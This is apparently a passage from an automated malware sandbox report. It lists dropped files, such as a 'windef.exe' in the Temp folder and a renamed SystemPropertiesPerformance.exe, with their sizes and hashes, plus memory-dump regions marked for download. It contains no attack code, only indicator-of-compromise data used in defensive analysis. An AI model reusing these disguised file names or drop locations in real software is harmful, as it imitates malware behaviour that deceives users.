                                        SHA256

                                        4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

                                        SHA512

                                        7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\windef.exe
                                        Filesize

                                        349KB

                                        MD5

                                        b4a202e03d4135484d0e730173abcc72

                                        SHA1

                                        01b30014545ea526c15a60931d676f9392ea0c70

                                        SHA256

                                        7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

                                        SHA512

                                        632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

                                        Download Submit

                                      • C:\Users\Admin\AppData\Roaming\Logs\12-01-2024
                                        Filesize

                                        224B

                                        MD5

                                        37d886917a968bd9094b1e1d72ead4df

                                        SHA1

                                        75fffad0817f0d59f7c24567f7b9867681c405f2

                                        SHA256

                                        4ed87f11a208817957b5a76a7a9a8cebb20bcc0842e1164e2b5ae4d383eb80bd

                                        SHA512

                                        18601b2d8418382f3fd622ae0844b2c39533148785adce45e38873ffd7b437e8a41c79b8caa1cba836b9c1fdb7dcaf8fb9be10cab4a571bb00771b9fb020f76e

                                        Download Submit

                                      • C:\Users\Admin\AppData\Roaming\Logs\12-01-2024
                                        Filesize

                                        224B

                                        MD5

                                        772fd38095d601403bf0fea378589daf

                                        SHA1

                                        7c748f677c6cec207b7915652cf203165429a51d

                                        SHA256

                                        e5825b42933d7854fa74241ef3045cd6387292f85643dd9036df0e073916ce0c

                                        SHA512

                                        e3cd401362c4910cf20a693df69b5b05c32656f5dcb98e7a61743635096f8162e4854f5d0a23fbb0b96bfb32d49c250d0fcda513e22d6e460b6add06770ae50d

                                        Download Submit

                                      • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                                        Filesize

                                        2.0MB

                                        MD5

                                        954f23783ff03120254f36f1780af7e5

                                        SHA1

                                        bdf9f43650fe4d4fe9d1649210f710b0efef5b72

                                        SHA256

                                        b849a13cf292a2a76b4a06cf0e60f6a9bbe3dce2661e9e55c957b18ef7c15e8e

                                        SHA512

                                        3ab2d8c3bfe132ecd75cface458dff89fe8a5a1c1a7ab9b93e2d9d0dd6189a6adec5ce755c4fd6328758b65eb8e81622e00b69c0837a92326f26e697eb165b84

                                        Download Submit

                                      • memory/1476-19-0x00000000001C0000-0x00000000001E0000-memory.dmp

                                        Filesize

                                        128KB

                                        Download

                                      • memory/1476-28-0x00000000001C0000-0x00000000001E0000-memory.dmp

                                        Filesize

                                        128KB

                                        Download

                                      • memory/1612-79-0x00000000004B0000-0x00000000004D0000-memory.dmp

                                        Filesize

                                        128KB

                                        Download

                                      • memory/1612-73-0x00000000004B0000-0x00000000004D0000-memory.dmp

                                        Filesize

                                        128KB

                                        Download

                                      • memory/1648-88-0x0000000075710000-0x0000000075B60000-memory.dmp

                                        Filesize

                                        4.3MB

                                        Download

                                      • memory/1648-18-0x0000000004240000-0x0000000004241000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2180-29-0x0000000000FF0000-0x000000000104E000-memory.dmp

                                        Filesize

                                        376KB

                                        Download

                                      • memory/2180-36-0x0000000006CB0000-0x0000000006CEC000-memory.dmp

                                        Filesize

                                        240KB

                                        Download

                                      • memory/2180-35-0x0000000006770000-0x0000000006782000-memory.dmp

                                        Filesize

                                        72KB

                                        Download

                                      • memory/2180-34-0x0000000005A70000-0x0000000005AD6000-memory.dmp

                                        Filesize

                                        408KB

                                        Download

                                      • memory/2180-33-0x0000000005AF0000-0x0000000005B82000-memory.dmp

                                        Filesize

                                        584KB

                                        Download

                                      • memory/2180-32-0x00000000060A0000-0x0000000006644000-memory.dmp

                                        Filesize

                                        5.6MB

                                        Download

                                      • memory/3948-44-0x0000000006D70000-0x0000000006D7A000-memory.dmp

                                        Filesize

                                        40KB

                                        Download

                                      We care about your privacy.

                                      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.